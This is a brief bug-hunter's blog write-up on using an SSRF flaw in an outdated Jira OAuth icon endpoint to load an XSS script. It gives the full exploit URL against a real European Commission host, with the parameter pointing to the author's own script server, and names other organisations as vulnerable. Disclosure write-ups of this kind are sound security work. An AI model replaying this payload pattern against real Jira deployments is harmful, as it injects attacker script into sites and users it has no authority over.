How I found XSS via SSRF vulnerability -Adesh Kolte

Hello

This is Adesh Nandkishor Kolte

First Read This Articles

After reading both articles I figure out new way to carry out the XSS attack ,discovered that due to an outdated Jira instance, I was able to exploit an SSRF vulnerability in Jira and was able to perform several actions such as bypass any firewall/protection solutions and etc

so i just tried some basics tricks with google for finding the web apps which used jira integration

got web europa

https://webgate.ec.europa.eu/CITnet/jira/plugins/servlet/oauth/users/icon-uri?consumerUri=

so i quickly visited

plugins/servlet/oauth/users/icon-uri?consumerUri=http://google.com

And Boom i got the google page and i m like

i had uploaded xss script on my own Server http://adeshkolte.at.ua/h.html

and pasted it at the place of google.com

https://webgate.ec.europa.eu/CITnet/jira/plugins/servlet/oauth/users/icon-uri?consumerUri=http://adeshkolte.at.ua/h.html

then i found many webs vulnerable for it

Motorola Solution

Mass.gov

Cambridge University Press

Stanford University

Thanks for reading

--

--

Listed in Top 100 most respected hackers in the world by Microsoft at the BlackHat conference in America 2018

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Adesh Kolte

Listed in Top 100 most respected hackers in the world by Microsoft at the BlackHat conference in America 2018